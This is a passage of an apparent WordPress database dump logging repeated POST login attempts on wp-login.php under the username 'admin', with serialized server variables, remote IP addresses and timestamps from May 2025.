Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43066\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.201.172\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746870287.336518;s:12:\"REQUEST_TIME\";i:1746870287;}}','199.188.201.172',0,'2025-05-10 15:14:49','1970-01-01 00:00:00'),(95297,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62446\";s:11:\"REMOTE_ADDR\";s:12:\"106.75.190.3\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746871664.0516379;s:12:\"REQUEST_TIME\";i:1746871664;}}','106.75.190.3',0,'2025-05-10 15:37:45','1970-01-01 00:00:00'),(95298,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38572\";s:11:\"REMOTE_ADDR\";s:12:\"45.89.237.80\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746872342.1207919;s:12:\"REQUEST_TIME\";i:1746872342;}}','45.89.237.80',0,'2025-05-10 15:49:03','1970-01-01 00:00:00'),(95299,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48492\";s:11:\"REMOTE_ADDR\";s:12:\"69.57.162.14\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746873016.121799;s:12:\"REQUEST_TIME\";i:1746873016;}}','69.57.162.14',0,'2025-05-10 16:00:17','1970-01-01 00:00:00'),(95300,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56950\";s:11:\"REMOTE_ADDR\";s:14:\"198.187.29.206\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746873685.637713;s:12:\"REQUEST_TIME\";i:1746873685;}}','198.187.29.206',0,'2025-05-10 16:11:27','1970-01-01 00:00:00'),(95301,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39224\";s:11:\"REMOTE_ADDR\";s:15:\"198.186.130.214\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746874366.3193309;s:12:\"REQUEST_TIME\";i:1746874366;}}','198.186.130.214',0,'2025-05-10 16:22:48','1970-01-01 00:00:00'),(95302,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36530\";s:11:\"REMOTE_ADDR\";s:13:\"195.161.114.5\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746875048.2284729;s:12:\"REQUEST_TIME\";i:1746875048;}}','195.161.114.5',0,'2025-05-10 16:34:10','1970-01-01 00:00:00'),(95303,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56112\";s:11:\"REMOTE_ADDR\";s:12:\"78.47.178.44\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746875712.77616;s:12:\"REQUEST_TIME\";i:1746875712;}}','78.47.178.44',0,'2025-05-10 16:45:14','1970-01-01 00:00:00'),(95304,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49088\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.201.153\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746876375.2757039;s:12:\"REQUEST_TIME\";i:1746876375;}}','199.188.201.153',0,'2025-05-10 16:56:17','1970-01-01 00:00:00'),(95305,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48508\";s:11:\"REMOTE_ADDR\";s:14:\"188.166.237.78\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746877014.0732789;s:12:\"REQUEST_TIME\";i:1746877014;}}','188.166.237.78',0,'2025-05-10 17:06:55','1970-01-01 00:00:00'),(95306,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35358\";s:11:\"REMOTE_ADDR\";s:12:\"198.54.120.4\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746877645.9142029;s:12:\"REQUEST_TIME\";i:1746877645;}}','198.54.120.4',0,'2025-05-10 17:17:27','1970-01-01 